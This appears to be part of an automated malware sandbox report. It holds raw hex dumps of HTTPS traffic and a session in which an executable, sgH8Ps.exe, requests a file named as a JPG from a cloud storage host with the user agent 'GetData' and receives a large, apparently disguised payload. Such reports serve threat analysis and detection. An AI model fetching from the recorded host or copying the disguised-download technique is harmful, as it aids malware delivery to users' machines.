2025-01-02 11:15:22 UTC	3548	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-02 11:15:22 UTC	4096	IN	Data Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 Data Ascii: B;K5Aat=BGjD=\|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@\|-$XW9!][b-I^pHcf
2025-01-02 11:15:22 UTC	4096	IN	Data Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
2025-01-02 11:15:22 UTC	4096	IN	Data Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c Data Ascii: E^h0X<LU)dF]:ywSDJu7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD\|T#c-Cpk^0ncLhz43h\`/k?_wE\
2025-01-02 11:15:22 UTC	4096	IN	Data Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;\|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
2025-01-02 11:15:22 UTC	4096	IN	Data Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ\|fan?adq~\|
2025-01-02 11:15:22 UTC	4096	IN	Data Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
2025-01-02 11:15:22 UTC	4096	IN	Data Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca Data Ascii: ~07,7OL\|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
2025-01-02 11:15:22 UTC	4096	IN	Data Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
2025-01-02 11:15:22 UTC	4096	IN	Data Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]\|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49996	118.178.60.9	443	6196	C:\Users\user\Documents\sgH8Ps.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:15:35 UTC	115	OUT	GET /FOM-52.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:15:36 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:15:35 GMT Content-Type: image/jpeg Content-Length: 5062442 Connection: close x-oss-request-id: 677675577CF842343889E7A0 Accept-Ranges: bytes ETag: "70C21DA900796B279A09040B00953E40" Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 360383310743409046 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: cMIdqQB5ayeaCQQLAJU+QA== x-oss-server-time: 57
2025-01-02 11:15:36 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-02 11:15:36 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2025-01-02 11:15:36 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-02 11:15:36 UTC	4096	IN	Data Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus\|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
2025-01-02 11:15:36 UTC	4096	IN	Data Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,\|Zk!4ROn2 HPijFS~DcC69Kv m
2025-01-02 11:15:36 UTC	4096	IN	Data Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
2025-01-02 11:15:36 UTC	4096	IN	Data Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71 Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
2025-01-02 11:15:36 UTC	4096	IN	Data Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59 Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<\|=UyO}YzX<~+#~j8cZ2[.K0`++@)GZrg"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
2025-01-02 11:15:36 UTC	4096	IN	Data Raw: ef cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3 Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:
